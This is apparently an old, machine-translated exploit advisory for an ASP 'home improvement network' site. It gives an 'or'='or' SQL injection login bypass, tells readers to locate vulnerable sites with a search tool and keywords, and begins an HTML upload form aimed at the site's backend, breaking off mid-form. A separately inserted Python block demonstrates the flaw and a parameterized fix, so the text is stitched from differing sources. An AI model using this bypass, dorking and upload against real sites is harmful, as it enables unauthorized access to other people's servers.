Home improvement network 0day a gold-bug warning-the black bar safety net

2011-03-10T00:00:00
ID MYHACK58:62201129681
Type myhack58
Reporter Anonymous
Modified 2011-03-10T00:00:00

Description

Author: broken sword

Release date: 2011-03-08

Vulnerability type: file upload

Vulnerability file: gd_ChkLogin.asp

Vulnerability description:

I posted part of the code for analysis.

<%
' FoundErr, ErrMsg, WriteErrMsg(), conn and md5() come from an include file that is not shown here
dim user1,pass1,rs,sql
user1=trim(request("textfield"))   ' obtains the user name input and assigns it to user1
pass1=trim(request("textfield2"))  ' obtains the password input and assigns it to pass1
' neither value is filtered in any way
if user1="" then
    FoundErr=True
    ErrMsg=ErrMsg & "<br><li>user name can not be empty!</li>"
end if
if pass1="" then
    FoundErr=True
    ErrMsg=ErrMsg & "<br><li>the password can not be empty!</li>"
end if
if not isnumeric(request.form("passcode")) then
    FoundErr=True
    ErrMsg=ErrMsg & "<br><li>verification code must be numeric, please fill in the correct!</li>"
else if Session("GetCode")<>Cint(request.form("passcode")) then
    FoundErr=True
    ErrMsg=ErrMsg & "<br><li>a verification code error, please fill in the correct!</li>"
    end if
end if
if FoundErr=True then
    call WriteErrMsg()
else
    set rs=server.CreateObject("adodb.recordset")
    sql="select * from admin_door where admin_user='" & user1 & "' and admin_pass='" & md5(pass1) & "'"
    ' user1 and pass1 are placed directly into the query string
    rs.open sql,conn,1,1
    if rs.bof and rs.eof then
        FoundErr=True
        ErrMsg=ErrMsg & "<br><li>username or password incorrect!</li>"
        call WriteErrMsg()
    else
        SessionTimeout=40
        session.Timeout=SessionTimeout
        session("admin_name")=rs("admin_user")
        session("admin_quanxian")=rs("admin_quanxian") ' administrator privileges
        'session("adminname")=rs("admin_user")
        Response.redirect "default.asp"
    end if
    rs.close
    set rs=nothing
end if
%>

user1 and pass1 are not filtered at all, so the backend login can be bypassed with 'or'='or'.
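The string concatenation in gd_ChkLogin.asp is the whole defect, and the fix is to bind the two values instead of pasting them into the SQL text. The following Python/SQLite script is an added illustration, not code from the advisory or from the affected product: it rebuilds the page's query shape over a constructed admin_door table with one made-up account, shows that a username of the same shape as the page's payload (written here as ' or 1=1 or ' so the injected condition is also true under SQLite's typing rules) returns a row without knowing the password, and shows the parameterized form of the same query rejecting it.

```python
import hashlib
import sqlite3


def md5hex(s: str) -> str:
    # Mirrors the page's md5(pass1); a real login should use a salted password hash instead.
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the admin_door table the ASP page queries, with one
    hypothetical account (user/password values are made up for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin_door (admin_user TEXT, admin_pass TEXT, admin_quanxian INTEGER)"
    )
    conn.execute(
        "INSERT INTO admin_door VALUES (?, ?, ?)",
        ("admin", md5hex("correct horse"), 1),
    )
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, user1: str, pass1: str) -> bool:
    """Same pattern as gd_ChkLogin.asp: request values concatenated into the SQL text.
    Whatever the user types becomes part of the query's grammar."""
    sql = (
        "select * from admin_door where admin_user='"
        + user1
        + "' and admin_pass='"
        + md5hex(pass1)
        + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_param(conn: sqlite3.Connection, user1: str, pass1: str) -> bool:
    """Hardened form of the same lookup: the driver binds the values, so the
    query grammar is fixed and the input can only ever be compared as data."""
    sql = "select * from admin_door where admin_user=? and admin_pass=?"
    return conn.execute(sql, (user1, md5hex(pass1))).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Constructed test input with the same shape as the page's 'or'='or' bypass.
    injected = "' or 1=1 or '"
    print("concat, valid creds   :", login_concat(db, "admin", "correct horse"))
    print("concat, injected user :", login_concat(db, injected, "anything"))
    print("param,  valid creds   :", login_param(db, "admin", "correct horse"))
    print("param,  injected user :", login_param(db, injected, "anything"))
```

The concatenated version answers true for the injected username because the OR it introduces sits outside the AND with the password hash; the bound version compares the literal string against admin_user and finds nothing. The same change (parameters in place of string building) is the fix to apply in the ASP file, together with re-checking every other query that builds SQL from request values.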

Backend address: /backdoor/gd_login.asp

Exploit:

In the excavator tool, add /backdoor/gd_login.asp

Keywords: home improvement network (choose good keywords for your search)

'or'='or' gets you into the backend. Save the following code locally as canjian.html

<html>
<head>
<title>image upload</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
td{font-size:12px}
a{color:#000000;text-decoration: none}
a:hover{text-decoration: underline}
.tx{height:16px;width:30px;border-color:black black #000000;border-top-width:0px;border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 12px; background-color: #eeeeee; color: #0000FF}
.button{font-size:12px;border-top-width:0px;border-right-width:0px;border-bottom-width:0px;border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}
.tx1{height:20px;width:30px;font-size:12px;border:1px solid;border-color:black black #000000;color: #0000FF}
-->
</style>
<script language="javascript">
<!--
function mysub()
{
    esave.style.visibility="visible";
}
-->
</script>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<form name="form1" method="post" action="http://www.xxx.com/backdoor/upload_asp.asp" enctype="multipart/form-data" >
<div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
<TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR><td width=20%></td>
<TD bgcolor=#104A7B width="60%">
<TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
<TR>
<td bgcolor=#eeeeee align=center><font color=red>are uploading files, please wait...</font></td>
</tr>
</table>
</td><td width=20%></td>
</tr></table></div>
<table width="400" border="0" cellspacing="1" cellpadding="0" align="center" bgcolor="#D5D5D5">
<tr>
<td height="22" align="left" valign="middle" width="400"> image upload
